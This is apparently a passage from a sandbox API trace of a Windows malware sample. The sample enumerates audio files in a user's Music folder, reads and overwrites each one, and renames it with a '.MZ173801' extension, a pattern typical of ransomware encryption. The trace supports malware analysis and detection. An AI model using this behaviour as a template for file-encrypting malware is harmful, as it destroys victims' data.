lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.060] GetCurrentThreadId () returned 0x1358 [0117.060] GetCurrentThreadId () returned 0x1358 [0117.060] GetCurrentThreadId () returned 0x1358 [0117.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\0VlS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\0vls.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.061] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.061] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.061] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x3228 [0117.061] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.061] ReadFile (in: hFile=0x404, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3228, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x3228, lpOverlapped=0x0) returned 1 [0117.062] CloseHandle (hObject=0x404) returned 1 [0117.062] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\0VlS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\0vls.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.063] WriteFile (in: hFile=0x404, lpBuffer=0x2435b60*, nNumberOfBytesToWrite=0x3228, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2435b60*, lpNumberOfBytesWritten=0x19f424*=0x3228, lpOverlapped=0x0) returned 1 [0117.064] CloseHandle (hObject=0x404) returned 1 [0117.065] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\0VlS.mp3" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\0vls.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\0VlS.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\0vls.mp3.mz173801")) returned 1 [0117.065] GetCurrentThreadId () returned 0x1358 [0117.066] GetCurrentThreadId () returned 0x1358 [0117.066] GetCurrentThreadId () returned 0x1358 [0117.066] GetCurrentThreadId () returned 0x1358 [0117.066] GetCurrentThreadId () returned 0x1358 [0117.066] GetCurrentThreadId () returned 0x1358 [0117.066] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df5fc90, ftCreationTime.dwHighDateTime=0x1d5e5b1, ftLastAccessTime.dwLowDateTime=0x60396960, ftLastAccessTime.dwHighDateTime=0x1d5ee4f, ftLastWriteTime.dwLowDateTime=0x60396960, ftLastWriteTime.dwHighDateTime=0x1d5ee4f, nFileSizeHigh=0x0, nFileSizeLow=0x4c71, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="AGpwWiEbNPs_OK mC0E.m4a", cAlternateFileName="AGPWWI~1.M4A")) returned 1 [0117.066] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.066] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\AGpwWiEbNPs_OK mC0E.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\agpwwiebnps_ok mc0e.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1df5fc90, ftCreationTime.dwHighDateTime=0x1d5e5b1, ftLastAccessTime.dwLowDateTime=0x60396960, ftLastAccessTime.dwHighDateTime=0x1d5ee4f, ftLastWriteTime.dwLowDateTime=0x60396960, ftLastWriteTime.dwHighDateTime=0x1d5ee4f, nFileSizeHigh=0x0, nFileSizeLow=0x4c71)) returned 1 [0117.067] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.067] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.067] GetCurrentThreadId () returned 0x1358 [0117.068] GetCurrentThreadId () returned 0x1358 [0117.068] GetCurrentThreadId () returned 0x1358 [0117.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.068] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.068] GetCurrentThreadId () returned 0x1358 [0117.068] GetCurrentThreadId () returned 0x1358 [0117.068] GetCurrentThreadId () returned 0x1358 [0117.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\AGpwWiEbNPs_OK mC0E.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\agpwwiebnps_ok mc0e.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.068] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.068] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.069] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x4c71 [0117.069] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.069] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4c71, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x4c71, lpOverlapped=0x0) returned 1 [0117.069] CloseHandle (hObject=0x404) returned 1 [0117.070] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\AGpwWiEbNPs_OK mC0E.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\agpwwiebnps_ok mc0e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.071] WriteFile (in: hFile=0x404, lpBuffer=0x2438c90*, nNumberOfBytesToWrite=0x4c71, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2438c90*, lpNumberOfBytesWritten=0x19f424*=0x4c71, lpOverlapped=0x0) returned 1 [0117.072] CloseHandle (hObject=0x404) returned 1 [0117.075] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\AGpwWiEbNPs_OK mC0E.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\agpwwiebnps_ok mc0e.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\AGpwWiEbNPs_OK mC0E.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\agpwwiebnps_ok mc0e.m4a.mz173801")) returned 1 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] GetCurrentThreadId () returned 0x1358 [0117.076] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf121ea0, ftCreationTime.dwHighDateTime=0x1d5e6c1, ftLastAccessTime.dwLowDateTime=0xcaedd600, ftLastAccessTime.dwHighDateTime=0x1d5e216, ftLastWriteTime.dwLowDateTime=0xcaedd600, ftLastWriteTime.dwHighDateTime=0x1d5e216, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="ATjrrwOvtU", cAlternateFileName="ATJRRW~1")) returned 1 [0117.076] FindNextFileW (in: hFindFile=0xa1bbd0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80d1f90, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x44ed2440, ftLastAccessTime.dwHighDateTime=0x1d5e6ec, ftLastWriteTime.dwLowDateTime=0x44ed2440, ftLastWriteTime.dwHighDateTime=0x1d5e6ec, nFileSizeHigh=0x0, nFileSizeLow=0xecb1, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="b79RtRRk9TDjgGdhgjZ.wav", cAlternateFileName="B79RTR~1.WAV")) returned 1 [0117.076] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.076] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\b79RtRRk9TDjgGdhgjZ.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\b79rtrrk9tdjggdhgjz.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80d1f90, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x44ed2440, ftLastAccessTime.dwHighDateTime=0x1d5e6ec, ftLastWriteTime.dwLowDateTime=0x44ed2440, ftLastWriteTime.dwHighDateTime=0x1d5e6ec, nFileSizeHigh=0x0, nFileSizeLow=0xecb1)) returned 1 [0117.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.077] GetCurrentThreadId () returned 0x1358 [0117.077] 